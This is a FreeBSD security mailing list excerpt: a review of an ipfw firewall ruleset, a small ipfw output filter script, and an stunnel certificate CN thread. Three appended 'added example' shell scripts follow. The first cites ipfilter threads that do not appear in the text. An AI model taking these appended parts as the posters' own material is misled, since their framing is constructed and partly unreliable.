> # oip="192.0.2.1"
>
> # set these to your inside interface network and netmask and ip
> iif="xl1"
> inet="192.168.0.0"
> imask="255.255.255.0"
> iip="192.168.0.6"
>
> # Stop spoofing
> ${fwcmd} add deny all from ${inet}:${imask} to any in via ${oif}
> # ${fwcmd} add deny all from ${onet}:${omask} to any in via ${iif}
>
> # Stop RFC1918 nets on the outside interface
> ${fwcmd} add deny all from 10.0.0.0/8 to any via ${oif}
> ${fwcmd} add deny all from any to 10.0.0.0/8 out via ${oif}
> ${fwcmd} add deny all from 172.16.0.0/12 to any via ${oif}
> ${fwcmd} add deny all from any to 172.16.0.0/12 out via ${oif}
> ${fwcmd} add deny all from 192.168.0.0/16 to any via ${oif}
> ${fwcmd} add deny all from any to 192.168.0.0/16 out via ${oif}
>
> # Stop draft-manning-dsua-01.txt nets on the outside interface
> ${fwcmd} add deny all from 0.0.0.0/8 to any via ${oif}
> ${fwcmd} add deny all from any to 0.0.0.0/8 via ${oif}
> ${fwcmd} add deny all from 169.254.0.0/16 to any via ${oif}
> ${fwcmd} add deny all from any to 169.254.0.0/16 via ${oif}
> ${fwcmd} add deny all from 192.0.2.0/24 to any via ${oif}
> ${fwcmd} add deny all from any to 192.0.2.0/24 via ${oif}
> ${fwcmd} add deny all from 224.0.0.0/4 to any via ${oif}
> ${fwcmd} add deny all from any to 224.0.0.0/4 via ${oif}
> ${fwcmd} add deny all from 240.0.0.0/4 to any via ${oif}
> ${fwcmd} add deny all from any to 240.0.0.0/4 via ${oif}

I'd log the above since you should not be seeing them and they can
help debug broken NAT setups.

> # Allow TCP through if setup succeeded
> ${fwcmd} add pass tcp from any to any established
>
> # Allow IP fragments to pass through
> ${fwcmd} add pass all from any to any frag
>
> # HTTP - Allow access to our web server
> ${fwcmd} add pass tcp from any to any 80 setup
>
> # SMTP - Allow access to sendmail for incoming e-mail
> ${fwcmd} add pass tcp from any to any 25 setup
>
> # FTP - Allow incoming data channel for outgoing connections,
> # Reject&Log all incoming control connections
> ${fwcmd} add pass tcp from any 20 to any 1024-65535 setup
> ${fwcmd} add deny tcp log tcp from any to any 21 in via ${oif} setup
                            ^^^ Typo.

> # SSH Login - Allow & Log all incoming
> ${fwcmd} add pass log tcp from any to any 22 in via ${oif} setup
>
> # IDENT - Reset incoming connections
> ${fwcmd} add reset tcp from any to any 113 in via ${oif} setup
>
> # Reject&Log all setup of incoming connections from the outside
> ${fwcmd} add deny log tcp from any to any in via ${oif} setup
>
> # Allow setup of any other TCP connection
> ${fwcmd} add pass tcp from any to any setup
>
> # Allow access to our DNS
> # ${fwcmd} add pass tcp from any to ${oif} 53 setup
> # ${fwcmd} add pass udp from any to ${oif} 53
> # ${fwcmd} add pass udp from ${oif} 53 to any
>
> # Allow DNS queries out in the world
> ${fwcmd} add pass udp from any 53 to ${oif}
> ${fwcmd} add pass udp from ${oif} to any 53

These two previous sets of rules are messed up. You are using an
interface as a source and destination argument.

> # Allow NTP queries out in the world
> ${fwcmd} add pass udp from any 123 to any 123 via ${oif}
> ${fwcmd} add pass udp from any 123 to any via ${iif}
> ${fwcmd} add pass udp from any to any 123 via ${iif}
>
> # TRACEROUTE - Allow outgoing, but not incoming
> ${fwcmd} add pass udp from any to any 33434-33523 out via ${oif}
>
>
> ### ICMP RULES
>
> # ICMP packets
> # Allow all ICMP packets on internal interface
> ${fwcmd} add pass icmp from any to any via ${iif}
>
> # Allow outgoing pings, but not incoming
> ${fwcmd} add pass icmp from any to any icmptypes 8 out via ${oif}
> ${fwcmd} add pass icmp from any to any icmptypes 0 in via ${oif}
>
> # Allow Destination Unreachable, Source Quench, Time Exceeded, and Bad
> Head
> ${fwcmd} add pass icmp from any to any icmptypes 3,4,11,12 via ${oif}
>
> # Deny the rest of them
> ${fwcmd} add deny icmp from any to any
>
>
> # Everything else is denied by default, unless the
> # IPFIREWALL_DEFAULT_TO_ACCEPT option is set in your kernel
> # config file.
> ;;

[snip]

-- 
Crist J. Clark
cjclark@alum.mit.edu

Content-Disposition: attachment; filename=ipfwsh

#!/bin/sh
#
# ipfwsh - 2000/10/28, cjc
#
# Cut down verbosity of 'ipfw show' output

if [ $# -gt 1 ]; then
	# Bad command line
	echo "ipfwsh: bad args" >&2
	echo "Usage: ipfwsh [iface]" >&2
	exit 1
elif [ $# -eq 0 ]; then
	# Print whole list, just cut expired dynamic rules
	ipfw show | awk -F'[ ,]' '$5 != 0 { print }'
else
	# An interface name was given, note there is no failure if
	# name is not valid
	ipfw show | awk -v"iface=$1" '/^## Dynamic rules:/ { exit }
					$0 ~ iface { print; next }
					/(via|recv|xmit)/ { next }
					{ print }'
fi

From owner-freebsd-security Sat Nov 18 19:57:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.i-dns.net (unknown [203.126.116.228]) by hub.freebsd.org (Postfix) with ESMTP id F343237B479 for ; Sat, 18 Nov 2000 19:57:07 -0800 (PST)
Received: from huiminvaio (spnp47087.spnp.nus.edu.sg [137.132.47.97]) by mail.i-dns.net (Postfix) with SMTP id E1283FFC01; Sun, 19 Nov 2000 11:57:32 +0800 (SGT)
Message-ID: <000701c051dc$c59dec10$6600a8c0@huiminvaio>
Reply-To: "Lim Hui Min"
From: "Lim Hui Min"
To: "Angelo a.k.a shagy" ,
References: <20001110134230.29329.qmail@web2904.mail.yahoo.com>
Subject: Re: stunnel, outlook express and qpopper
Date: Fri, 17 Nov 2000 21:50:30 +0800
Organization: i-DNS.net International
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Make sure your Common Name, when you create your cert, is EXACTLY the
same as the server name that you are popping from in outlook express.

HM

----- Original Message -----
From: "Angelo a.k.a shagy"
To:
Sent: Friday, November 10, 2000 9:42 PM
Subject: Re: stunnel, outlook express and qpopper

> > On Fri, Nov 10, 2000 at 12:55:26AM -0800, Angelo a.k.a shagy wrote:
> > > Greetings I'm trying to wrap pop3 with stunnel (ssl)
> > > I'm using FreeBSD 3.4
> > > stunnel 3.4a (from the ports)
> > > qpopper 3.1
> > >
> > > I start qpopper with the following options
> > > "qpopper 192.168.5.1:110 -S"
> > >
> > > Then stunnel starts up like so
> > > "stunnel -d pop3s -r 192.168.5.1:pop3"
> > >
> > > When trying to access mail through outlook express I
> > > get the following message.
> > > "The server you are connected to is using a security
> > > certificate that does not match its internet address.
> > > Do you want to continue using this server?"
> > >
> > > I've read that IE and Netscape have a hard coded list
> > > of Certificate Authorities. And you can get this
> > > message if you haven't had your server certificate
> > > signed by a CA such as verisign. Is this an absolute
> > > truth *or* is there a way around this? Or am I just
> > > way off?!
> > >
> > > Any help would be appreciated
> >
> > A self-signed certificate worked fine for me back when I used to run a
> > similar setup (UW-IMAP and POP3, stunnel, and MS OE). How did you make
> > your cert?
> > --
> >
> Hi, here is how I created the certificate....
>
> First I generated the unencrypted server key
> "openssl genrsa -out server.key 1024"
>
> Then I created a server certificate request with the unencrypted key
> "openssl req -new -days 365 -key server.key -out newreq.pem"
>
> Created my own Certificate Authority and self-signed.
> (I used CA.pl to do this)
> "perl CA.pl -newca" #made a certificate authority
> "perl CA.pl -sign" #self-signed the request
>                    #(I got a file named "newcert.pem" as a result)
>
> Then I generated a dh file for stunnel
> "openssl gendh -out dh 1024"
>
> Put it all together like so
> "cat server.key newcert.pem dh > stunnel.pem"
>
> I also removed non operational text from stunnel.pem.....the end result was
> similar to this.
>
> ---BEGIN RSA PRIVATE KEY---
> [encoded key]
> ---END RSA PRIVATE KEY---
> [empty line here]
> ---BEGIN CERTIFICATE---
> [encoded certificate]
> ---END CERTIFICATE---
> [empty line here]
> ---BEGIN DH PARAMETERS---
> [encoded key]
> ---END DH PARAMETERS---
>
>
> Everything seems to be working fine except for the message that
> I get from outlook.
>
> Thanks,
> Ang
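Added example for the two ipfilter threads above (Pedro Almeida's "ipf -F a" then "ipf -f" reload answer, and the ifconfig-to-ipf.cfg substitution Steve Reid describes and Rémi Guyomarch compares with OpenBSD). This is not Steve's ipfinit script, not OpenBSD's parse.c, and not code from any poster; it is a self-contained sh sketch of the same idea. The ifconfig output and the rule template are constructed samples, the @OIF@/@OIP@/@OMASK@/@OBC@ placeholders are this example's own convention, and the reload step is only echoed so the script runs on a machine without ipfilter.

```sh
#!/bin/sh
# Added example, not the thread's own code: take the address, netmask and
# broadcast of an interface from ifconfig(8)-style output, substitute them
# into an ipfilter rule template, then show the reload sequence from the
# "Restarting Firewall ruleset" thread. Placeholders (@OIF@ etc.) are ours.

# Constructed sample of "ifconfig fxp0" output (not captured from a host).
SAMPLE_IFCONFIG='fxp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.0.2.10 netmask 0xffffff00 broadcast 192.0.2.255
	ether 00:00:5e:00:53:01
	media: Ethernet autoselect (100baseTX <full-duplex>)'

# Constructed ipf.cfg template using this example's placeholder convention.
SAMPLE_TEMPLATE='# @OIF@ is @OIP@ netmask @OMASK@ broadcast @OBC@
# anti-spoofing: nothing arriving from outside may claim our own address
block in quick on @OIF@ from @OIP@ to any
# our own outbound traffic, with state kept for the replies
pass out quick on @OIF@ from @OIP@ to any keep state
block in on @OIF@ all'

# ifconfig_field KEY: print the value that follows KEY ("inet", "netmask"
# or "broadcast") on the first inet line of ifconfig output read from stdin.
ifconfig_field() {
    awk -v key="$1" '
        $1 == "inet" {
            for (i = 1; i < NF; i++)
                if ($i == key) { print $(i + 1); exit }
        }'
}

# hexmask_to_dotted 0xffffff00 -> 255.255.255.0 (FreeBSD prints masks in hex)
hexmask_to_dotted() {
    n=$(printf '%d' "$1")
    echo "$(( (n >> 24) & 255 )).$(( (n >> 16) & 255 )).$(( (n >> 8) & 255 )).$(( n & 255 ))"
}

# render_rules IFACE TEMPLATE < ifconfig-output: fill in the placeholders.
# Fails (status 1, nothing printed) when the interface has no inet address,
# e.g. a ppp/tun interface that is not up yet.
render_rules() {
    iface=$1 template=$2
    text=$(cat)
    ip=$(printf '%s\n' "$text" | ifconfig_field inet)
    if [ -z "$ip" ]; then
        echo "render_rules: no inet address found for $iface" >&2
        return 1
    fi
    mask=$(hexmask_to_dotted "$(printf '%s\n' "$text" | ifconfig_field netmask)")
    bc=$(printf '%s\n' "$text" | ifconfig_field broadcast)
    printf '%s\n' "$template" |
        sed -e "s|@OIF@|$iface|g" -e "s|@OIP@|$ip|g" \
            -e "s|@OMASK@|$mask|g" -e "s|@OBC@|$bc|g"
}

# reload_ipf RULEFILE: the reload sequence from the thread. The commands
# are only echoed here; on a real gateway drop the leading "echo".
reload_ipf() {
    echo ipf -Fa          # flush the active rule set
    echo ipf -f "$1"      # load the newly rendered one
}

# Demonstration on the constructed sample
rules=$(printf '%s\n' "$SAMPLE_IFCONFIG" | render_rules fxp0 "$SAMPLE_TEMPLATE")
printf '%s\n' "$rules"
reload_ipf /etc/ipf.cfg.rendered
```

On a live system the sample text is replaced by `/sbin/ifconfig "$iface"` piped into `render_rules`, the rendered text is written to a file, and that file is what `ipf -f` loads after the `ipf -Fa` flush; keeping the flush and the load adjacent keeps the window with no rules loaded as short as possible.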
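Added example for Crist Clark's review of the posted rc.firewall above: a small lint for ipfw(8) "add" rules that catches the two mistakes he flagged, an interface name used where an address belongs ("to ${oif}") and the protocol given twice ("deny tcp log tcp"). This is not Crist's ipfwsh script and not part of FreeBSD; the rule lines below are taken from Sam Carleton's post with the variables expanded (oif="ep0" is the poster's own value) and a clean rule added for contrast.

```sh
#!/bin/sh
# Added example, not the thread's own code: lint ipfw "add" rules for an
# address field that is not an address and for a duplicated protocol word.

# lint_ipfw_rule 'add ...': print one diagnostic per problem found,
# return 1 if any was found, 0 if the rule looks sane.
# Negated addresses ("from not 10/8") and hostnames are not accepted here;
# a boot-time rule set should not depend on name resolution anyway.
lint_ipfw_rule() {
    printf '%s\n' "$1" | awk '
    # an ipfw address: any, me, dotted quad with optional /bits or :mask
    function is_addr(t) {
        return t == "any" || t == "me" ||
               t ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+(\/[0-9]+|:[0-9.]+)?$/
    }
    {
        bad = 0
        nproto = 0
        for (i = 1; i <= NF; i++) {
            if ($i == "from" || $i == "to") {
                if (i == NF || !is_addr($(i + 1))) {
                    print $i " is followed by \"" $(i + 1) "\", not an address"
                    bad = 1
                }
            }
        }
        # protocol keywords before "from": more than one means a typo
        for (i = 1; i <= NF && $i != "from"; i++)
            if ($i ~ /^(tcp|udp|icmp|ip|all)$/) nproto++
        if (nproto > 1) {
            print "protocol given " nproto " times before \"from\""
            bad = 1
        }
        exit bad
    }'
}

# count_bad_rules < rules: lint every non-comment line, print the
# diagnostics to stderr and the number of bad rules to stdout.
count_bad_rules() {
    nbad=0
    while IFS= read -r line; do
        case $line in ''|\#*) continue ;; esac
        if ! lint_ipfw_rule "$line" >&2; then
            echo "  in: $line" >&2
            nbad=$((nbad + 1))
        fi
    done
    echo "$nbad"
}

# Rules from the post with ${oif} expanded, plus one correct anti-spoof rule.
oif="ep0"
SAMPLE_RULES="add pass tcp from any to any established
add pass tcp from any to any 80 setup
add deny tcp log tcp from any to any 21 in via ${oif} setup
add pass log tcp from any to any 22 in via ${oif} setup
add pass udp from any 53 to ${oif}
add pass udp from ${oif} to any 53
add deny all from 192.168.0.0:255.255.255.0 to any in via ${oif}"

echo "bad rules: $(printf '%s\n' "$SAMPLE_RULES" | count_bad_rules)"
```

Running it on the sample reports three bad rules: the duplicated `tcp` and the two DNS rules that name `ep0` in an address position. The fix Crist implies is to write those with `via ${oif}` and a real address (or `any`) in the `from`/`to` slots.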
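Added example for the stunnel thread above, where Lim Hui Min's answer is that the certificate's Common Name must equal the host name Outlook Express connects to. This is not Angelo's CA.pl procedure and not stunnel's or qpopper's code; it generates a self-signed certificate with openssl(1) directly (a different route from CA.pl that yields an equivalent server certificate), reads the CN back, and checks it against the POP3 host the client would use. It assumes openssl is installed; "pop.example.com" and "mail.example.com" are placeholders. DH parameters, which stunnel 3.x also wanted in the pem, are not generated here.

```sh
#!/bin/sh
# Added example, not the thread's own code: make a self-signed stunnel
# certificate whose CN matches the POP3 host, then check an existing
# certificate for the CN mismatch behind the Outlook Express warning.
# Assumes openssl(1); host names used below are placeholders.

# make_selfsigned_cert HOST KEYFILE CERTFILE
# Private key plus self-signed certificate with CN=HOST. -nodes leaves the
# key unencrypted because stunnel has to read it unattended at startup.
make_selfsigned_cert() {
    host=$1 keyfile=$2 certfile=$3
    openssl req -new -x509 -days 365 -nodes -newkey rsa:2048 \
        -keyout "$keyfile" -out "$certfile" -subj "/CN=$host" 2>/dev/null
}

# cert_cn CERTFILE: print the subject Common Name of a PEM certificate.
# RFC2253 output gives "subject=CN=host[,...]" on every OpenSSL version.
cert_cn() {
    openssl x509 -in "$1" -noout -subject -nameopt RFC2253 |
        sed -n 's/^subject=.*CN=\([^,]*\).*/\1/p'
}

# cn_matches CERTFILE HOST: status 0 when the CN equals HOST, 1 otherwise.
# HOST must be the exact name configured in the mail client, which is
# what the thread's answer comes down to.
cn_matches() {
    [ "$(cert_cn "$1")" = "$2" ]
}

# assemble_stunnel_pem KEYFILE CERTFILE OUT: key first, then certificate,
# the order the thread's "cat server.key newcert.pem ... > stunnel.pem" uses.
assemble_stunnel_pem() {
    cat "$1" "$2" > "$3"
}

# Demonstration with placeholder names in a scratch directory
workdir=$(mktemp -d)
make_selfsigned_cert pop.example.com "$workdir/server.key" "$workdir/server.crt"
assemble_stunnel_pem "$workdir/server.key" "$workdir/server.crt" "$workdir/stunnel.pem"
echo "certificate CN: $(cert_cn "$workdir/server.crt")"
for client_host in pop.example.com mail.example.com; do
    if cn_matches "$workdir/server.crt" "$client_host"; then
        echo "$client_host: CN matches, no certificate warning expected"
    else
        echo "$client_host: CN mismatch, the client will warn"
    fi
done
rm -rf "$workdir"
```

The check is the one to run before restarting stunnel after any certificate change: feed it the stunnel.pem and the host name exactly as typed into the client's account settings, since a short name, a different alias of the same machine, or a bare IP address all count as mismatches.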